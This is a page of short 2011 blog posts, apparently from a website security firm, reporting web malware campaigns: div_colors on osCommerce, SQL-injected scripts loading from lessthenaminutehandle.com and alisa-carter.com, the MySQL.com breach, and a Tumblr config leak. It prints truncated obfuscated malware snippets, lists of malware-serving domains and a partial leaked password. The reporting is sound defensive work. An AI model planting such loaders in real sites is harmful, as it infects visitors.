The “div_colors” Malware Update

March 29, 2011 by 4 Comments

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


Read More

Filed Under: blacklisted, hacked, Malware, malware_updates, oscommerce Tagged With: , , , ,

Will Google blacklist itself?

March 28, 2011 by 3 Comments

We were analyzing an infected site today and their Google blacklist diagnostic said the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.

Hum… So Google.com was somehow infected as well? I know it is probably some small sub site from within Google, but I found it interesting that they listed Google’s main domain in there.

If you look at Google’s own diagnostic page, it says:

31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.

 
Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.

 
Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.

Let’s see if Google actually blacklists themselves :)

Filed Under: blacklisted, google Tagged With: ,

Malware week: The div_colors, CreateCSS and others

March 28, 2011 by 1 Comment

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.

div_colors

For example, the div_colors malware that infected a lot of osCommerce sites, looks like a javascript color picker. This is how it looks like in an infected site:

if (typeof(redef_colors)==”undefined”) {

var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);


Read More

Filed Under: hacked, Malware, malware_updates, oscommerce Tagged With: , , ,

MySQL.com compromised

March 27, 2011 by 40 Comments

MySQL.com (the official site for the MySQL database) was compromised via (shocking!) blind SQL injection. A post was sent today to the full disclosure list explaining the issue and dumping part of their internal database structure.

Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
Host IP : 213.136.52.29
Web Server : Apache/2.2.15 (Fedora)
Powered-by : PHP/5.2.13
Injection Type : MySQL Blind
Current DB : web


Read More

Filed Under: hacked, security Tagged With: ,

Database injection and lessthenaminutehandle.com – Intermediary domains

March 22, 2011 by Leave a Comment

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.

These are just some of the ones used in the last 24 hours:

http://defender-dyxa.co.cc/scan1/188

http://antivirus-3879.co.cc/scan1/188

http://antivirus-9465.co.cc/scan1/188

http://antivirus-4274.co.cc/scan1/188

http://yquwtuog.co.cc/scan1/188

http://mrxzvtwt.co.cc/scan1/188

http://lowoxnsm.co.cc/scan1/188

http://iuhcypsp.co.cc/scan1/188

http://vycdmonz.co.cc/scan1/188

http://zgfozmcr.co.cc/scan1/188

http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D

http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D

http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D

http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D

http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D

http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D

http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D

www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

As you can see, changing from .cc, .co.cc, .in., .rr.nu and even some .com in there. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. By checking those on Google, none of them got blacklisted, showing that their tactics are working.

We will keep posting details we learn more.

If your site is infected with malware or blacklisted, we are here to help.

Filed Under: blacklisted, godaddy, hacked, Malware, malware_updates Tagged With: , , , ,

Attacks against IIS/ASP sites – alisa-carter dot com

March 21, 2011 by 1 Comment

Over the last few days, we’ve seen a number of sites getting hacked with a malware script pointing to http://alisa-carter.com/ur.php . It is done using the same SQL injection attack as used in therobint-us mass infection a few months ago.

Multiple domains are being used to distribute the malware, including:

http://alisa-carter.com/ur.php

http://google-stats50.info/ur.php

http://pop-stats.info/ur.php

http://sol-stats.info/ur.php

http://online-guest.info/ur.php

http://google-stats48.info/ur.php

http://google-stats49.info/ur.php

http://google-stats50.info/ur.php

http://multi-stats.info/ur.php


Read More

Filed Under: blacklisted, hacked, iis Tagged With: , ,

Tumblr mistake or security issue

March 19, 2011 by 6 Comments

There is a post on Hacker News about a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. Here is some of the stuff that was disclosed:

Database::set_defaults(array( ‘user’ => ‘tumblr3′, ‘password’ => ‘m3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′, ..

define(‘MEMCACHE_HOST’, ’10.252.0.68′); define(‘MEMCACHE_VERSION_HOST’, ‘10.252.0.67‘);

Database::add(‘primary’, array(‘host’ => ’192.168.200.142‘)); ..


Read More

Filed Under: security Tagged With: ,

Database injection, Hilary Kneber and lessthenaminutehandle dot com

March 17, 2011 by 8 Comments

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.

Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).

This hack also injects the malware on every post in the database, but this time encoded as:

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..


Read More

Filed Under: godaddy, hacked, Malware, malware_updates, WordPress Tagged With: , , , ,

Solution for the link injection spam from basicpills

March 16, 2011 by 11 Comments

We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those links from all their posts. On large WordPress sites, it can be a very tedius task to go through thousands of posts manually removing each link spam…

To help out, we posted a clean up script here http://tools.sucuri.net/malware/helpers/spam-postremoval.txt for anyone that needs to clean up their site. It will remove link spam from the 4 domains that are the most commonly used in this attack:

Read More

Filed Under: Malware, malware_updates, pharma, Spam, WordPress Tagged With: , , , ,

Oracle.com, Wetpaint, Spammers, and the Tale of an Unmoderated Wiki

March 14, 2011 by 1 Comment

Update: A few hours after this post going live, it seems that Oracle started to clean up the wiki. Very good!

Oracle’s official Wiki (at http://wiki.oracle.com ) is becoming a haven for spammers. The site has a high page rank (PR 7), is completely open and unmoderated, uses a free builder from wetpaint.com (yes, you have to create an account at wetpaint.com to participate there) and looks to have no one taking care of it.

Guess what happens when you visit? Try to visit their main page (wiki.oracle.com – Scanned link) to see by yourself:



Read More

Filed Under: oracle, pharma, Spam Tagged With: , ,
«Older Posts